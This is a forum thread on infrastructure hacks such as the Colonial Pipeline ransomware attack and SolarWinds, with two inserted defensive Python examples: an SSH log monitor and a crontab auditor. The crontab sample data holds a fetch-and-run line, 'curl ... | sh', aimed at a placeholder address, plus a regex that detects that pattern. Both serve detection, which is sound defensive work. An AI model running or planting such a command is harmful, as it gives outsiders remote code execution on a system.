Things not working so well in the deep freeze

The biggest problem is how they are getting in. It’s never really disclosed, but honestly the majority of these hacks are done the same way. Someone downloads malware from a suspicious email, or maybe a password gets guessed because people are lazy and will make easily guessable passwords (not judging, I’m equally guilty).

I doubt there is any technical TV-style hacking magic going on, maybe a little coding. But 95% of all of this can still be stopped pretty cold with really basic cyber security steps. Problem is you need buy-in, enforcement, etc. In all infrastructure industries two factor ID should be standard; something at this level probably should’ve had two factor ID along with a two factor sign-off from another, preferably senior, individual.

1 Like

Yep, a lot of it is pretty simple phishing techniques.

Worth watching the movie Black Hat.

People are stupid. Filling up tubs with gas? No problem people getting beat for doing that.

On a side note, seems like electricity with Oncor has been worse than normal since the freeze. I believe we are at 4 times now power going out with twice being multiple hours. Not even during storms, last one was multiple hours after a storm had passed. Are there still some issues with lines/infrastructure or just random that we have had so many power issues?

Yes, a lot of it is low tech stuff. But we dealt with Russian hackers ages ago and busted a group that had set up shop near our data center. Some of the guys on our team even feared personal retribution from them. 2 factor is fine and dandy, but on some of the devices you manage, like routers and switches, it’s hard to implement, so you set up trusts with keys between “secure” servers and devices. And monitor the logs closely. These guys will sniff the networks. If they plant some code on your servers you are in trouble. Using encryption is a must, and only using secure protocols (sftp vs ftp). But they are good and may have access to thousands of nodes of state sponsored super computers for cracking. It’s a constant battle responding to CERT advisories (and there are a lot) and keeping your gear up and running.

But I think you are right in that most break-ins are phishing and malware installed by unsuspecting staff. We don’t know the details about the pipeline hack, and publicly we may never know. But the sophisticated stuff does happen.
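On the “set up key trusts and monitor the logs closely” point above: here is what that monitoring looks like in practice, as an added example (not from any poster in this thread). It runs over a few constructed OpenSSH auth-log lines and flags the three things a key-only management network should never see: a burst of failed logins from one source, an accepted password login where only public keys are supposed to work, and an accepted login from a source that is not one of the assumed jump hosts. The jump-host addresses, the threshold and the log lines are all made up for the example.

```python
import re
from collections import Counter

# Constructed sample of OpenSSH auth-log lines (not a real capture).
SAMPLE_LOG = """\
May  9 02:11:01 core-rtr-mgmt sshd[2101]: Accepted publickey for netops from 10.20.0.5 port 51002 ssh2: ED25519 SHA256:aaaa
May  9 02:11:30 core-rtr-mgmt sshd[2102]: Failed password for root from 203.0.113.77 port 40011 ssh2
May  9 02:11:31 core-rtr-mgmt sshd[2102]: Failed password for root from 203.0.113.77 port 40012 ssh2
May  9 02:11:32 core-rtr-mgmt sshd[2102]: Failed password for invalid user admin from 203.0.113.77 port 40013 ssh2
May  9 02:11:33 core-rtr-mgmt sshd[2102]: Failed password for netops from 203.0.113.77 port 40014 ssh2
May  9 02:11:34 core-rtr-mgmt sshd[2102]: Failed password for netops from 203.0.113.77 port 40015 ssh2
May  9 02:12:10 core-rtr-mgmt sshd[2103]: Accepted password for netops from 198.51.100.9 port 33001 ssh2
May  9 02:13:00 core-rtr-mgmt sshd[2104]: Accepted publickey for netops from 10.20.0.6 port 51010 ssh2: ED25519 SHA256:bbbb
"""

# Matches both "Accepted <method> for <user>" and "Failed <method> for [invalid user] <user>".
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# Assumed jump hosts that are allowed to hold the key trust (hypothetical values).
TRUSTED_SOURCES = {"10.20.0.5", "10.20.0.6"}
# Number of failures from one source before we call it a brute-force attempt.
FAIL_THRESHOLD = 4


def parse(log_text):
    """Return one dict per recognised sshd auth line; unrelated lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            events.append(m.groupdict())
    return events


def analyze(log_text, trusted=TRUSTED_SOURCES, threshold=FAIL_THRESHOLD):
    """Return (finding_type, source_ip, detail) tuples for the three conditions we care about."""
    events = parse(log_text)
    findings = []

    # 1. Repeated failures from a single source: password guessing against the device.
    fails = Counter(e["ip"] for e in events if e["result"] == "Failed")
    for ip, n in fails.items():
        if n >= threshold:
            findings.append(("brute_force", ip, n))

    # 2./3. Successful logins that break the key-only / jump-host-only policy.
    for e in events:
        if e["result"] != "Accepted":
            continue
        if e["method"] != "publickey":
            findings.append(("password_login", e["ip"], e["user"]))
        if e["ip"] not in trusted:
            findings.append(("untrusted_source", e["ip"], e["user"]))
    return findings


if __name__ == "__main__":
    for kind, ip, detail in analyze(SAMPLE_LOG):
        print(f"{kind:17s} {ip:15s} {detail}")
```

The point of the third check is that an accepted login is the event worth alerting on, not just the failures: with key trusts, a success from an address that is not a jump host means either the policy has drifted or a key has been copied somewhere it should not be.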

Are you guys forgetting the largest computer hack came last year? SolarWinds? For all we know this ransomware attack was an offshoot of that.

No, it’s part of my point. This is happening and keeps happening. They were different types of breaches though.

Randy, I think I agree they were different types of breaches. The pipeline thing sounds like ransomware, which is most often the result of the victims unwittingly assisting in installing stuff via downloading. The SolarWinds thing sounded very serious and sophisticated; as I read it, source code of the Orion software was modified and a cyber security firm’s network was penetrated, presumably by use of the Orion monitoring software. That’s just my understanding from general media sources I’ve read.

I think it would be helpful if the FBI would be more transparent about the details of all these incidents and did live demo re-enactments of how these events unfolded. We are not reaching enough or the right folks imho.

https://security.berkeley.edu/faq/ransomware/how-does-computer-become-infected-ransomware

That’s my understanding too. SolarWinds went on for months without anyone knowing. It seems like it was more about getting data for the Russian Govt.

The Colonial Pipeline breach was a ransomware attack where immediate money was the goal. It seems there were different players with different goals, which led to different short term outcomes.

That’s just what I’m seeing in public. We will probably learn more over time.

And then to add a little twist to it, perhaps the in-house IT staff intentionally worked with the ransomware folks. Could the FBI even find out if an individual has a cryptocurrency account with a big deposit? Or a disgruntled former employee left a cron job to load it. As far as I know, that’s never happened…but probably just a matter of time before it’s done.

1 Like
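The “former employee left a cron job” scenario above is one of the easier insider cases to check for, because the scheduled-task list is small and mostly static. This is an added example (not from any poster here) of the audit a defender would run over the system crontab after someone leaves: it parses constructed /etc/crontab-style entries and flags jobs owned by accounts that are no longer on the active user list, jobs that execute from world-writable directories, and jobs that pull something from the network and pipe it straight into a shell. The entries, the user list and the address in them are all made up for the example.

```python
import re

# Constructed /etc/crontab-style entries (system crontab format carries a user field).
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
0  3    * * *   backup  /usr/local/bin/nightly-backup.sh
*/5 *   * * *   jdoe    /tmp/.cache/update.sh
30 2    * * 0   svc-mon curl -s http://198.51.100.23/x.sh | sh
0  1    * * *   root    /opt/monitoring/rotate-logs.sh
"""

# Assumed current account list after offboarding (hypothetical); 'jdoe' is meant to have left.
ACTIVE_USERS = {"root", "backup", "svc-mon"}

# Directories anyone on the box can write to; a scheduled job living there is a red flag.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Fetch-and-execute pattern: a downloader whose output is piped into sh or bash.
REMOTE_EXEC_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def parse_crontab(text):
    """Split system-crontab lines into schedule, user and command; skip comments and blanks."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # Five schedule fields, the user, then the rest of the line is the command.
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        entries.append({
            "schedule": " ".join(fields[:5]),
            "user": fields[5],
            "command": fields[6],
        })
    return entries


def audit_crontab(text, active_users=ACTIVE_USERS):
    """Return (finding_type, user, command) tuples for entries that need a human to look at them."""
    findings = []
    for e in parse_crontab(text):
        if e["user"] not in active_users:
            findings.append(("unknown_user", e["user"], e["command"]))
        if any(d in e["command"] for d in WRITABLE_DIRS):
            findings.append(("world_writable_path", e["user"], e["command"]))
        if REMOTE_EXEC_RE.search(e["command"]):
            findings.append(("remote_exec", e["user"], e["command"]))
    return findings


if __name__ == "__main__":
    for kind, user, cmd in audit_crontab(SAMPLE_CRONTAB):
        print(f"{kind:20s} {user:8s} {cmd}")
```

The same three checks apply to per-user crontabs, systemd timers and anything else that runs unattended; the unknown-user check is the one that directly answers the thread’s question, since a departed account still owning a scheduled job is exactly the leftover this scenario describes.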

Turns out it wasn’t just the freeze that the Texas grid and ERCOT can’t handle.